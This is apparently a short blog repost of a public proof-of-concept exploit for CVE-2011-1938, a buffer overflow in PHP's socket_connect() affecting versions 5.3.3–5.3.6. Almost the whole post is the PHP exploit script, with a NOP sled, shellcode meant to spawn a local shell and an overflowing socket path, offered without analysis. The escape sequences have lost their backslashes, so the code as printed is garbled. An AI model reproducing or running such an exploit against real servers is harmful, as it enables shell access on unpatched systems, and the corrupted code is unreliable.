PHP inferior ou igual a 5.3.5 socket_connect() Buffer Overflow Vulnerability

25/05/2011 0 Comments

<?php

// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go...n";
define('EVIL_SPACE_ADDR', "xffxffxeexb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE =
"x6ax31x58x99xcdx80x89xc3x89xc1x6ax46x58xcdx80xb0".
"x0bx52x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x89xd1".
"xcdx80";
echo "[+] creating the sled.n";
$CODE = str_repeat("x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
$i < strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}
$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)n";
$var85 = socket_connect($var79,$b);

?>

 

fonte: http://www.exploit-db.com/exploits/17318

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.